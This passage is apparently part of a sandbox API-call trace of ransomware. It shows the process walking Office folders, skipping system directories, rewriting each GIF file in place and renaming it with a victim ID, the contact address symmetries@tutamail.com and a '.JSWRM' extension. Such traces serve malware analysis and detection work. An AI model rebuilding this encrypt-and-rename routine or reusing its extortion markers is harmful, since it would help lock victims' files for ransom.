lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1370, lpOverlapped=0x0) returned 1 [0119.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.690] CloseHandle (hObject=0x314) returned 1 [0119.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0119.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0119.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0119.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0119.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.690] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR46F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir46f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR46F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir46f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0119.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0119.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.692] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x80d9, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR47B.GIF", cAlternateFileName="")) returned 1 [0119.692] lstrcmpiW (lpString1="PDIR47B.GIF", lpString2=".") returned 1 [0119.692] lstrcmpiW (lpString1="PDIR47B.GIF", lpString2="..") returned 1 [0119.692] lstrcmpiW (lpString1="PDIR47B.GIF", lpString2="...") returned 1 [0119.692] lstrcmpiW (lpString1="PDIR47B.GIF", lpString2="windows") returned -1 [0119.692] lstrcmpiW (lpString1="PDIR47B.GIF", lpString2="recovery") returned -1 [0119.692] lstrcmpiW (lpString1="PDIR47B.GIF", lpString2="perflogs") returned -1 [0119.692] lstrcmpiW (lpString1="PDIR47B.GIF", lpString2="documents and settings") returned 1 [0119.692] lstrcmpiW (lpString1="PDIR47B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.692] lstrcmpiW (lpString1="PDIR47B.GIF", lpString2="system volume information") returned -1 [0119.692] lstrcmpiW (lpString1="PDIR47B.GIF", lpString2="msocache") returned 1 [0119.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0119.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR47B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR47B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR47B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0119.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR47B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR47B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR47B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0119.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0119.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR47B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir47b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.694] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=32985) returned 1 [0119.694] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80d0) returned 0x24e1d8 [0119.694] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x80d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x80d0, lpOverlapped=0x0) returned 1 [0119.697] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.697] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x80d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x80d0, lpOverlapped=0x0) returned 1 [0119.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.698] CloseHandle (hObject=0x314) returned 1 [0119.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0119.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0119.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0119.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0119.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0119.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.698] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR47B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir47b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR47B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir47b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0119.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0119.699] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ae8, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR47F.GIF", cAlternateFileName="")) returned 1 [0119.699] lstrcmpiW (lpString1="PDIR47F.GIF", lpString2=".") returned 1 [0119.699] lstrcmpiW (lpString1="PDIR47F.GIF", lpString2="..") returned 1 [0119.700] lstrcmpiW (lpString1="PDIR47F.GIF", lpString2="...") returned 1 [0119.700] lstrcmpiW (lpString1="PDIR47F.GIF", lpString2="windows") returned -1 [0119.700] lstrcmpiW (lpString1="PDIR47F.GIF", lpString2="recovery") returned -1 [0119.700] lstrcmpiW (lpString1="PDIR47F.GIF", lpString2="perflogs") returned -1 [0119.700] lstrcmpiW (lpString1="PDIR47F.GIF", lpString2="documents and settings") returned 1 [0119.700] lstrcmpiW (lpString1="PDIR47F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.700] lstrcmpiW (lpString1="PDIR47F.GIF", lpString2="system volume information") returned -1 [0119.700] lstrcmpiW (lpString1="PDIR47F.GIF", lpString2="msocache") returned 1 [0119.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0119.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR47F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR47F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR47F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0119.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0119.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR47F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR47F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR47F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0119.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0119.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0119.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR47F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir47f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.701] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=15080) returned 1 [0119.701] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3ae0) returned 0x24e1d8 [0119.701] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x3ae0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x3ae0, lpOverlapped=0x0) returned 1 [0119.704] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.704] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x3ae0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x3ae0, lpOverlapped=0x0) returned 1 [0119.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.704] CloseHandle (hObject=0x314) returned 1 [0119.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0119.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0119.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0119.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0119.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0119.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0119.705] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR47F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir47f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR47F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir47f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0119.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0119.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0119.706] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b53, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR48B.GIF", cAlternateFileName="")) returned 1 [0119.706] lstrcmpiW (lpString1="PDIR48B.GIF", lpString2=".") returned 1 [0119.706] lstrcmpiW (lpString1="PDIR48B.GIF", lpString2="..") returned 1 [0119.706] lstrcmpiW (lpString1="PDIR48B.GIF", lpString2="...") returned 1 [0119.706] lstrcmpiW (lpString1="PDIR48B.GIF", lpString2="windows") returned -1 [0119.706] lstrcmpiW (lpString1="PDIR48B.GIF", lpString2="recovery") returned -1 [0119.706] lstrcmpiW (lpString1="PDIR48B.GIF", lpString2="perflogs") returned -1 [0119.706] lstrcmpiW (lpString1="PDIR48B.GIF", lpString2="documents and settings") returned 1 [0119.706] lstrcmpiW (lpString1="PDIR48B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.706] lstrcmpiW (lpString1="PDIR48B.GIF", lpString2="system volume information") returned -1 [0119.706] lstrcmpiW (lpString1="PDIR48B.GIF", lpString2="msocache") returned 1 [0119.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0119.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR48B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR48B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR48B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0119.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0119.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR48B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR48B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR48B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0119.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0119.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR48B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir48b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.707] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=11091) returned 1 [0119.707] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b50) returned 0x24e1d8 [0119.707] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2b50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2b50, lpOverlapped=0x0) returned 1 [0119.709] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.709] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2b50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2b50, lpOverlapped=0x0) returned 1 [0119.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.709] CloseHandle (hObject=0x314) returned 1 [0119.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0119.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0119.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0119.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 